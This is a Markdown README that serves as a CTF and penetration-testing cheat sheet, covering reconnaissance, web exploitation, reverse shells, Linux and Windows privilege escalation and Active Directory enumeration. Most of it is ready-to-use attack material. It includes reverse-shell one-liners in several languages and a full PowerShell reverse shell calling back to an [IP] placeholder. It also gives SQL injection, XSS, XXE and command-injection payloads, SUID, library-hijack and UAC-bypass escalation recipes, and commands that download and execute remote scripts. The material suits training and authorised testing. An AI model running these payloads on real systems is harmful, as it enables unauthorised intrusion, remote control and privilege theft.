Files
CTF_CheatSheet/README.md
T
2026-07-30 20:32:10 +01:00

460 lines
12 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters
This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.
# CTF_CheatSheet
## **Stage 1 Lay of the Land (Enumeration)**
### Active Reconnaissance
| Tool | Purpose | Key Command |
|------|---------|------------|
| **Nmap** | Port scanning & service detection | `nmap -sV -sC -oA nmap/basic [IP]` |
| **Masscan** | Ultra-fast port scanning | `masscan [IP] -p 1-65535 --rate 10000 -oX masscan.xml` |
| **Netdiscover** | ARP discovery on local network | `netdiscover -i [INTERFACE]` |
| **RPC Client** | Enumerate RPC services & null sessions | `rpcclient -U "" [IP]` |
| **Enum4Linux** | SMB/LDAP/RPC enumeration | `enum4linux [IP]` |
### Passive Reconnaissance
| Tool | Purpose |
|------|---------|
| **Shodan** | Internet-wide device search |
| **Wayback Machine** | Historical website snapshots |
| **The Harvester** | Email and subdomain enumeration |
| **DNS Recon** | DNS enumeration and zone transfers |
### Directory & File Enumeration
| Tool | Command |
|------|---------|
| **Gobuster (HTTP)** | `gobuster dir -u http://[URL] -w [wordlist] -t 10 -r` |
| **Gobuster (DNS)** | `gobuster dns -d [domain] -w [wordlist]` |
| **Dirb** | `dirb http://[URL] /path/to/wordlist` |
| **FFuF** | `ffuf -u http://[URL]/FUZZ -w [wordlist] -mc 200,204,301,302,307,401,403` |
---
## **Nmap Deep Dive**
```bash
# Basic comprehensive scan
nmap -sV -sC -oA nmap/basic [IP]
# All ports with version detection
nmap -p- -sV -oA nmap/full [IP]
# Aggressive scan with OS detection
nmap -A -T4 [IP]
# UDP scan
nmap -sU -p 53,161,162,445,500 [IP]
# Stealth scan (SYN)
nmap -sS -p- [IP]
# Script scan (NSE)
nmap --script vuln [IP]
# Service version enumeration
nmap -sV --script smb-enum-shares -p 445 [IP]
```
### Nmap Command Reference
**HOST DISCOVERY:**
- `-sL` List Scan
- `-sn` Ping Scan (no port scan)
- `-Pn` Skip host discovery, treat all as online
**SCAN TECHNIQUES:**
- `-sS` TCP SYN (stealthy)
- `-sT` TCP Connect
- `-sU` UDP Scan
- `-sA` ACK Scan
- `-sN/-sF/-sX` NULL/FIN/Xmas Scans
**PORT SPECIFICATION:**
- `-p 22,80,443` Specific ports
- `-p 1-65535` All ports
- `-p U:53,T:80` Mixed UDP/TCP
**OUTPUT:**
- `-oN` Normal
- `-oX` XML
- `-oG` Grepable
- `-oA` All formats
---
## **Masscan Reference**
```bash
# Fast scan all ports
masscan [IP/CIDR] -p 1-65535 --rate 10000 -oX output.xml
# Grab banners
masscan [IP/CIDR] -p 80,443,8080 --banners -oX output.xml
# Read and convert binary results
masscan --open --banners --readscan input.bin -oX output.xml
```
---
## **Stage 2 Initial Access (Foothold)**
### Web Exploitation
#### Common Web Vulns to Exploit
| Vulnerability | Description | Exploitation |
|---|---|---|
| **SQL Injection** | Database query manipulation | `' OR '1'='1'; --` |
| **XSS** | JavaScript injection in DOM | `<img src=x onerror="alert('XSS')">` |
| **CSRF** | Cross-Site Request Forgery | Forge requests with valid session tokens |
| **Path Traversal** | Access files outside intended dir | `../../../etc/passwd` |
| **XXE** | XML External Entity injection | `<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>` |
| **SSRF** | Server-Side Request Forgery | `http://localhost:8080/admin` |
| **Command Injection** | OS command execution | `; cat /etc/passwd` |
| **LFI/RFI** | Local/Remote File Inclusion | `?file=../../../../etc/passwd` |
#### SQLMap
```bash
# Basic SQL injection test
sqlmap -u "http://[URL]?id=1" --dbs
# Dump all databases
sqlmap -u "http://[URL]?id=1" --dump-all
# OS shell
sqlmap -u "http://[URL]?id=1" --os-shell
# POST request
sqlmap -u "http://[URL]" --data="user=admin&pass=test" -p user --dbs
```
#### Burp Suite Workflow
1. **Capture traffic** in Proxy
2. **Send to Repeater** for manual testing
3. **Send to Intruder** for fuzzing/brute force
4. **Scanner** for automated vulnerability detection
5. **Decoder** for encoding/decoding payloads
#### Web Shell Uploads
```bash
# Test file upload with shell
# Common shell names: shell.php, index.php, upload.php
# Check upload bypass techniques:
# - shell.php.jpg
# - shell.jpg.php
# - shell.php%00.jpg
# - shell.phtml
# - shell.shtml
# - shell.phar
```
### Reverse Shells & Initial Access
#### Listener Setup
```bash
# Netcat listener
nc -lvnp [PORT]
# Multi-handler (Metasploit)
msfconsole
> use exploit/multi/handler
> set PAYLOAD windows/meterpreter/reverse_tcp
> set LHOST [YOUR_IP]
> set LPORT [PORT]
> run
```
#### Reverse Shell Payloads
| Language | Command |
|----------|---------|
| **Bash** | `bash -i >& /dev/tcp/[IP]/[PORT] 0>&1` |
| **Python** | `python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("[IP]",[PORT]));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'` |
| **PHP** | `php -r '$sock=fsockopen("[IP]",[PORT]);exec("/bin/sh -i <&3 >&3 2>&3");'` |
| **Node.js** | `require('child_process').exec("bash -c 'bash -i >& /dev/tcp/[IP]/[PORT] 0>&1'");` |
| **PowerShell** | `powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("[IP]",[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535\|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()` |
| **Java** | See payload generators at http://www.jackson-t.ca/runtime-exec-payloads.html |
#### PentestMonkey PHP Reverse Shell
php-reverse-shell - A Reverse Shell implementation in PHP
**PentestMonkey PHP Reverse Shell:** A Reverse Shell implementation in PHP - Check https://github.com/pentestmonkey/php-reverse-shell
#### Upgrade Shell to TTY (Linux)
```bash
# Check if TTY
tty
# Upgrade with Python
python3 -c "import pty;pty.spawn('/bin/bash')"
# Full interactive terminal
stty raw -echo; fg
export TERM=xterm
```
#### Windows Reverse Shell (PowerShell)
```powershell
# Powershell reverse shell
$client = New-Object System.Net.Sockets.TCPClient("[IP]",[PORT])
$stream = $client.GetStream()
[byte[]]$bytes = 0..65535|%{0}
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0) {
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i)
$sendback = (iex $data 2>&1 | Out-String)
$sendback2 = $sendback + "PS " + (pwd).Path + "> "
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
# One-liner
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('[IP]',[PORT]);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback = (iex $data 2>&1 | Out-String);$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
---
## **Stage 3 Privilege Escalation**
### Linux Privilege Escalation
#### Quick Enumeration
```bash
# Check current user and groups
id
whoami
groups
# Kernel version
uname -a
cat /etc/os-release
# Check SUID binaries
find / -user root -perm -4000 2>/dev/null
# Check for writable directories
find / -type d -writable 2>/dev/null
# Check sudo permissions
sudo -l
# Check cron jobs
crontab -l
cat /etc/cron* -l
# Check installed applications
apt list --installed
pip list
npm list -g
```
#### SUID Exploitation
**Find SUID binaries:**
```bash
find / -user root -perm -4000 2>/dev/null
```
**Exploit with GTFOBins:** Check https://gtfobins.github.io/ for SUID/sudo escapes
**Common SUID Exploits:**
```bash
# systemctl privilege escalation
cd /tmp
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cp /bin/bash /tmp/bash;chmod +s /tmp/bash"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
/tmp/bash -p
# Find library injection opportunities
ldd /path/to/suid/binary
# Shared library hijacking
mkdir -p /tmp/lib
echo 'int __libc_start_main() { system("bash"); return 0; }' > /tmp/lib/evil.c
gcc -shared -fPIC /tmp/lib/evil.c -o /tmp/lib/evil.so
LD_LIBRARY_PATH=/tmp/lib:/usr/lib /path/to/suid/binary
```
#### Capability Escalation
```bash
# Check for capabilities
getcap -r / 2>/dev/null
# Exploit (example: cap_setuid)
# Look up on GTFOBins for specific binary
```
#### Sudo Exploitation
```bash
# Check sudo permissions
sudo -l
# If ALL=(ALL) NOPASSWD: /usr/bin/python3
sudo /usr/bin/python3 -c "import os;os.system('/bin/bash')"
# Exploiting wildcards in sudo commands
# If: sudo /usr/bin/script.sh /tmp/*
# Create: /tmp/evil.sh
```
#### Kernel Exploitation
```bash
# Find kernel exploits
# Use: searchsploit, Exploit-DB
# Common kernels:
# 4.4.0-21 CVE-2016-5195 (Dirty COW)
# 5.4.0 overlayfs exploit
gcc -o exploit exploit.c
./exploit
```
#### PEASS Enumeration
```bash
# Download and run linPEAS
curl https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | bash
# Or:
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh
```
---
### Windows Privilege Escalation
#### Quick Enumeration
```powershell
# Current user and groups
whoami
whoami /groups
net user %USERNAME%
# System info
systeminfo
Get-ComputerInfo
# Check privileges
whoami /priv
# List installed applications
Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | Select DisplayName
```
#### Windows Privilege Escalation Vectors
| Vector | Check | Exploitation |
|--------|-------|--------------|
| **Unquoted Service Paths** | `wmic service list brief` | Place exe in path before target |
| **Weak Service Permissions** | `accesschk.exe -ucqv [SERVICE]` | Modify service binary or path |
| **AlwaysInstallElevated** | Registry check | `msiexec /i shell.msi /qn` |
| **Scheduled Tasks** | `schtasks /query /v` | Replace task binary |
| **Weak Registry Permissions** | Check ACLs on HKLM | Modify to point to malicious binary |
| **Kernel Exploits** | `systeminfo` for OS version | Search Exploit-DB |
| **UAC Bypass** | Check UAC status | Use bypassuac tools or exploits |
#### WinPEAS
```powershell
# Download and run WinPEAS
IEX(New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')
# Or direct binary
.\winPEASx64.exe
```
#### Common Windows Exploits
```powershell
# Unquoted service path exploitation
# Service: C:\Program Files\App\Service.exe
# Create: C:\Program.exe or C:\Program Files\App.exe
# AlwaysInstallElevated exploitation
msiexec /i malicious.msi /qn /norestart
# Scheduled task exploitation (if you can write to task location)
schtasks /create /tn evil /tr "C:\path\to\malicious.exe" /sc minute /mo 1
# UAC bypass - fodhelper.exe
New-Item -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Value "cmd.exe /c C:\path\to\payload.exe" -Force
fodhelper.exe
```
---
## **Stage 4 Active Directory (AD)**
### AD Enumeration
#### Basic Tools & Commands
```powershell
# Get domain info
[System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# List domain users
Get-ADUser -Filter * | Select Name, SamAccountName
# List domain groups
Get-ADGroup -Filter * | Select Name
# List group members
Get-ADGroupMember "Domain Admins"
# Check current user's groups
whoami /groups
# Find trusts
Get-ADTrust -Filter *
```
#### PowerView (AD Recon Toolkit)
```powershell
# Download PowerView
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')
# Get domain info
Get-NetDomain
Get-NetForest
# Enumerate users
Get-NetUser | Select name, lastlogon, pwdlastset
Get-NetUser -UACFilter DONT_EXPIRE_PASSWORD
# Find interesting shares
Invoke-ShareFinder
# Get group membership
Get-NetGroup "Domain Admins" | Get-NetGroupMember
# Find admin users
Get-NetUser -Admin
```